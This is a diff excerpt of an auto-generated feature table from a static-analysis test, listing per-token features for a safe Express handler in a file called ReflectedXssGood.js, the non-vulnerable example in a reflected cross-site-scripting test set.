autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:40:5:40:46 | exceptional return of res.sen ... ams.id) | enclosingFunctionBody | req res isValidUserId req params id res set Content-Type textContentType res send Unknown user: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:40:5:40:46 | exceptional return of res.sen ... ams.id) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:40:5:40:46 | exceptional return of res.sen ... ams.id) | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:40:5:40:46 | res.sen ... ams.id) | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:40:5:40:46 | res.sen ... ams.id) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:40:5:40:46 | res.sen ... ams.id) | enclosingFunctionBody | req res isValidUserId req params id res set Content-Type textContentType res send Unknown user: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:40:5:40:46 | res.sen ... ams.id) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:40:5:40:46 | res.sen ... ams.id) | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:40:9:40:12 | send | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:40:9:40:12 | send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:40:9:40:12 | send | enclosingFunctionBody | req res isValidUserId req params id res set Content-Type textContentType res send Unknown user: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:40:9:40:12 | send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:40:9:40:12 | send | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:40:14:40:29 | "Unknown user: " | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:40:14:40:29 | "Unknown user: " | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:40:14:40:29 | "Unknown user: " | enclosingFunctionBody | req res isValidUserId req params id res set Content-Type textContentType res send Unknown user: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:40:14:40:29 | "Unknown user: " | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:40:14:40:29 | "Unknown user: " | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:40:14:40:29 | "Unknown user: " | stringConcatenatedWith | -endpoint- req.params.id | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:40:14:40:45 | "Unknow ... rams.id | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:40:14:40:45 | "Unknow ... rams.id | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:40:14:40:45 | "Unknow ... rams.id | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | @@ -21148,6 +141075,47 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:40:14:40:45 | "Unknow ... rams.id | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:40:14:40:45 | "Unknow ... rams.id | fileImports | escape-html express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:40:14:40:45 | "Unknow ... rams.id | receiverName | res | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:40:33:40:35 | req | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:40:33:40:35 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:40:33:40:35 | req | enclosingFunctionBody | req res isValidUserId req params id res set Content-Type textContentType res send Unknown user: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:40:33:40:35 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:40:33:40:35 | req | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:40:33:40:42 | req.params | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:40:33:40:42 | req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:40:33:40:42 | req.params | enclosingFunctionBody | req res isValidUserId req params id res set Content-Type textContentType res send Unknown user: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:40:33:40:42 | req.params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:40:33:40:42 | req.params | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:40:33:40:45 | req.params.id | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:40:33:40:45 | req.params.id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:40:33:40:45 | req.params.id | enclosingFunctionBody | req res isValidUserId req params id res set Content-Type textContentType res send Unknown user: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:40:33:40:45 | req.params.id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:40:33:40:45 | req.params.id | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:40:33:40:45 | req.params.id | stringConcatenatedWith | 'Unknown user: ' -endpoint- | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:40:37:40:42 | params | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:40:37:40:42 | params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:40:37:40:42 | params | enclosingFunctionBody | req res isValidUserId req params id res set Content-Type textContentType res send Unknown user: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:40:37:40:42 | params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:40:37:40:42 | params | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:40:44:40:45 | id | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:40:44:40:45 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:40:44:40:45 | id | enclosingFunctionBody | req res isValidUserId req params id res set Content-Type textContentType res send Unknown user: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:40:44:40:45 | id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:40:44:40:45 | id | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:46:1:46:3 | app | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:46:1:46:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:46:1:46:3 | app | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:46:1:46:7 | app.get | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:46:1:46:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:46:1:46:7 | app.get | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:46:1:51:2 | app.get ... sg);\\n}) | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:46:1:51:2 | app.get ... sg);\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:46:1:51:2 | app.get ... sg);\\n}) | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:46:1:51:2 | exceptional return of app.get ... sg);\\n}) | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:46:1:51:2 | exceptional return of app.get ... sg);\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:46:1:51:2 | exceptional return of app.get ... sg);\\n}) | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:46:5:46:7 | get | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:46:5:46:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:46:5:46:7 | get | fileImports | escape-html express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:46:9:46:15 | '/echo' | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:46:9:46:15 | '/echo' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:46:9:46:15 | '/echo' | calleeImports | express | @@ -21155,6 +141123,21 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:46:9:46:15 | '/echo' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:46:9:46:15 | '/echo' | fileImports | escape-html express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:46:9:46:15 | '/echo' | receiverName | app | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:46:18:46:17 | this | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:46:18:46:17 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:46:18:46:17 | this | enclosingFunctionBody | req res msg req params msg res setHeader Content-Type application/json res setHeader Content-Length msg length res end msg | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:46:18:46:17 | this | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:46:18:46:17 | this | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:46:18:51:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:46:18:51:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:46:18:51:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res msg req params msg res setHeader Content-Type application/json res setHeader Content-Length msg length res end msg | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:46:18:51:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:46:18:51:1 | 'arguments' object of anonymous function | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:46:18:51:1 | exceptional return of anonymous function | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:46:18:51:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:46:18:51:1 | exceptional return of anonymous function | enclosingFunctionBody | req res msg req params msg res setHeader Content-Type application/json res setHeader Content-Length msg length res end msg | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:46:18:51:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:46:18:51:1 | exceptional return of anonymous function | fileImports | escape-html express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:46:18:51:1 | functio ... msg);\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:46:18:51:1 | functio ... msg);\\n} | InputArgumentIndex | 1 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:46:18:51:1 | functio ... msg);\\n} | calleeImports | express | @@ -21162,6 +141145,96 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:46:18:51:1 | functio ... msg);\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:46:18:51:1 | functio ... msg);\\n} | fileImports | escape-html express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:46:18:51:1 | functio ... msg);\\n} | receiverName | app | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:46:18:51:1 | return of anonymous function | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:46:18:51:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:46:18:51:1 | return of anonymous function | enclosingFunctionBody | req res msg req params msg res setHeader Content-Type application/json res setHeader Content-Length msg length res end msg | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:46:18:51:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:46:18:51:1 | return of anonymous function | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:46:27:46:29 | req | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:46:27:46:29 | req | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:46:27:46:29 | req | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:46:27:46:29 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:46:27:46:29 | req | enclosingFunctionBody | req res msg req params msg res setHeader Content-Type application/json res setHeader Content-Length msg length res end msg | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:46:27:46:29 | req | enclosingFunctionBody | req res msg req params msg res setHeader Content-Type application/json res setHeader Content-Length msg length res end msg | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:46:27:46:29 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:46:27:46:29 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:46:27:46:29 | req | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:46:27:46:29 | req | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:46:32:46:34 | res | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:46:32:46:34 | res | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:46:32:46:34 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:46:32:46:34 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:46:32:46:34 | res | enclosingFunctionBody | req res msg req params msg res setHeader Content-Type application/json res setHeader Content-Length msg length res end msg | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:46:32:46:34 | res | enclosingFunctionBody | req res msg req params msg res setHeader Content-Type application/json res setHeader Content-Length msg length res end msg | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:46:32:46:34 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:46:32:46:34 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:46:32:46:34 | res | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:46:32:46:34 | res | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:47:6:47:8 | msg | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:47:6:47:8 | msg | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:47:6:47:8 | msg | enclosingFunctionBody | req res msg req params msg res setHeader Content-Type application/json res setHeader Content-Length msg length res end msg | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:47:6:47:8 | msg | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:47:6:47:8 | msg | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:47:6:47:25 | msg | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:47:6:47:25 | msg | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:47:6:47:25 | msg | enclosingFunctionBody | req res msg req params msg res setHeader Content-Type application/json res setHeader Content-Length msg length res end msg | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:47:6:47:25 | msg | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:47:6:47:25 | msg | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:47:6:47:25 | msg = req.params.msg | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:47:6:47:25 | msg = req.params.msg | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:47:6:47:25 | msg = req.params.msg | enclosingFunctionBody | req res msg req params msg res setHeader Content-Type application/json res setHeader Content-Length msg length res end msg | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:47:6:47:25 | msg = req.params.msg | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:47:6:47:25 | msg = req.params.msg | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:47:12:47:14 | req | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:47:12:47:14 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:47:12:47:14 | req | enclosingFunctionBody | req res msg req params msg res setHeader Content-Type application/json res setHeader Content-Length msg length res end msg | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:47:12:47:14 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:47:12:47:14 | req | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:47:12:47:21 | req.params | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:47:12:47:21 | req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:47:12:47:21 | req.params | enclosingFunctionBody | req res msg req params msg res setHeader Content-Type application/json res setHeader Content-Length msg length res end msg | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:47:12:47:21 | req.params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:47:12:47:21 | req.params | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:47:12:47:25 | req.params.msg | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:47:12:47:25 | req.params.msg | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:47:12:47:25 | req.params.msg | enclosingFunctionBody | req res msg req params msg res setHeader Content-Type application/json res setHeader Content-Length msg length res end msg | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:47:12:47:25 | req.params.msg | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:47:12:47:25 | req.params.msg | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:47:16:47:21 | params | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:47:16:47:21 | params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:47:16:47:21 | params | enclosingFunctionBody | req res msg req params msg res setHeader Content-Type application/json res setHeader Content-Length msg length res end msg | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:47:16:47:21 | params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:47:16:47:21 | params | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:47:23:47:25 | msg | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:47:23:47:25 | msg | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:47:23:47:25 | msg | enclosingFunctionBody | req res msg req params msg res setHeader Content-Type application/json res setHeader Content-Length msg length res end msg | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:47:23:47:25 | msg | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:47:23:47:25 | msg | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:48:2:48:4 | res | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:48:2:48:4 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:48:2:48:4 | res | enclosingFunctionBody | req res msg req params msg res setHeader Content-Type application/json res setHeader Content-Length msg length res end msg | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:48:2:48:4 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:48:2:48:4 | res | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:48:2:48:14 | res.setHeader | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:48:2:48:14 | res.setHeader | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:48:2:48:14 | res.setHeader | enclosingFunctionBody | req res msg req params msg res setHeader Content-Type application/json res setHeader Content-Length msg length res end msg | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:48:2:48:14 | res.setHeader | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:48:2:48:14 | res.setHeader | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:48:2:48:50 | exceptional return of res.set ... /json') | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:48:2:48:50 | exceptional return of res.set ... /json') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:48:2:48:50 | exceptional return of res.set ... /json') | enclosingFunctionBody | req res msg req params msg res setHeader Content-Type application/json res setHeader Content-Length msg length res end msg | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:48:2:48:50 | exceptional return of res.set ... /json') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:48:2:48:50 | exceptional return of res.set ... /json') | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:48:2:48:50 | res.set ... /json') | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:48:2:48:50 | res.set ... /json') | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:48:2:48:50 | res.set ... /json') | enclosingFunctionBody | req res msg req params msg res setHeader Content-Type application/json res setHeader Content-Length msg length res end msg | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:48:2:48:50 | res.set ... /json') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:48:2:48:50 | res.set ... /json') | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:48:6:48:14 | setHeader | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:48:6:48:14 | setHeader | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:48:6:48:14 | setHeader | enclosingFunctionBody | req res msg req params msg res setHeader Content-Type application/json res setHeader Content-Length msg length res end msg | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:48:6:48:14 | setHeader | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:48:6:48:14 | setHeader | fileImports | escape-html express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:48:16:48:29 | 'Content-Type' | CalleeFlexibleAccessPath | res.setHeader | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:48:16:48:29 | 'Content-Type' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:48:16:48:29 | 'Content-Type' | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | @@ -21178,6 +141251,31 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:48:32:48:49 | 'application/json' | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:48:32:48:49 | 'application/json' | fileImports | escape-html express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:48:32:48:49 | 'application/json' | receiverName | res | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:49:2:49:4 | res | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:49:2:49:4 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:49:2:49:4 | res | enclosingFunctionBody | req res msg req params msg res setHeader Content-Type application/json res setHeader Content-Length msg length res end msg | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:49:2:49:4 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:49:2:49:4 | res | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:49:2:49:14 | res.setHeader | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:49:2:49:14 | res.setHeader | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:49:2:49:14 | res.setHeader | enclosingFunctionBody | req res msg req params msg res setHeader Content-Type application/json res setHeader Content-Length msg length res end msg | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:49:2:49:14 | res.setHeader | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:49:2:49:14 | res.setHeader | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:49:2:49:44 | exceptional return of res.set ... length) | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:49:2:49:44 | exceptional return of res.set ... length) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:49:2:49:44 | exceptional return of res.set ... length) | enclosingFunctionBody | req res msg req params msg res 